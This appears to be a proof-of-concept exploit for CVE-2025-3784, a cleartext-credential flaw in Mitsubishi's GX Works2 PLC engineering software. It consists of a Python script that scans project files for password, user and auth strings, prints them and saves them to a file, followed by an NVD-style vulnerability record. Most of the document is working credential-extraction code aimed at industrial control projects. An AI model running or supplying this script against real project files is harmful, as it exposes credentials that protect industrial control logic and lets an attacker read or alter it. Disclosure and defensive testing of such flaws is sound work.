CVE-2025-3784

#!/usr/bin/env python3 """ CVE-2025-3784 PoC - GX Works2 Project File Credential Extraction This PoC demonstrates extracting plaintext credentials from GX Works2 project files. Note: This is for educational and authorized security testing purposes only. """ import os import sys import re import binascii def extract_plaintext_credentials(file_path): """ Extract potential plaintext credentials from GX Works2 project files. GX Works2 project files may contain user authentication credentials stored in plaintext. """ print(f"[*] Analyzing file: {file_path}") if not os.path.exists(file_path): print(f"[-] Error: File not found: {file_path}") return try: with open(file_path, 'rb') as f: data = f.read() print(f"[+] File size: {len(data)} bytes") # Common password-related patterns in GX Works2 project files patterns = [ rb'password\s*[=: ]\s*([\x20-\x7e]+)', # password=xxx rb'pwd\s*[=: ]\s*([\x20-\x7e]+)', # pwd=xxx rb'pass\s*[=: ]\s*([\x20-\x7e]+)', # pass=xxx rb'user\s*[=: ]\s*([\x20-\x7e]+)', # user=xxx rb'auth\s*[=: ]\s*([\x20-\x7e]+)', # auth=xxx rb'credential\s*[=: ]\s*([\x20-\x7e]+)', # credential=xxx ] print("\n[*] Searching for plaintext credentials...") findings = [] for pattern in patterns: matches = re.finditer(pattern, data, re.IGNORECASE) for match in matches: # Filter out common false positives value = match.group(1).decode('utf-8', errors='ignore') if len(value) >= 3 and not value.lower() in ['null', 'none', 'false', 'true']: findings.append({ 'pattern': pattern.decode('utf-8', errors='ignore'), 'value': value, 'offset': match.start() }) # Also search for ASCII strings that look like credentials ascii_strings = re.findall(rb'[\x21-\x7e]{8,64}', data) print(f"\n[+] Found {len(findings)} potential credential matches") if findings: print("\n=== Extracted Credentials ===") for i, finding in enumerate(findings, 1): print(f"\n[{i}] Pattern: {finding['pattern']}") print(f" Value: {finding['value']}") print(f" Offset: 0x{finding['offset']:x}") # Save findings to file output_file = f"{os.path.splitext(file_path)[0]}_credentials.txt" with open(output_file, 'w') as f: f.write(f"CVE-2025-3784 - GX Works2 Credential Extraction Results\n") f.write(f"Target File: {file_path}\n") f.write(f"Analysis Date: {__import__('datetime').datetime.now()}\n\n") for i, finding in enumerate(findings, 1): f.write(f"\n[{i}] {finding['pattern']} = {finding['value']}\n") print(f"\n[+] Results saved to: {output_file}") except Exception as e: print(f"[-] Error during analysis: {str(e)}") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-3784_poc.py <project_file>") print("Example: python cve-2025-3784_poc.py sample.gx2") else: extract_plaintext_credentials(sys.argv[1])

{"cve": {"id": "CVE-2025-3784", "sourceIdentifier": "[email protected]", "published": "2025-11-27T05:16:15.467", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cleartext Storage of Sensitive Information Vulnerability in GX Works2 all versions allows an attacker to disclose credential information stored in plaintext from project files. As a result, the attacker may be able to open project files protected by user authentication using disclosed credential information, and obtain or modify project information."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-312"}]}], "references": [{"url": "https://jvn.jp/vu/JVNVU95288056/", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-338-01", "source": "[email protected]"}, {"url": "https://www.mitsubishielectric.com/psirt/vulnerability/pdf/2025-016_en.pdf", "source": "[email protected]"}]}}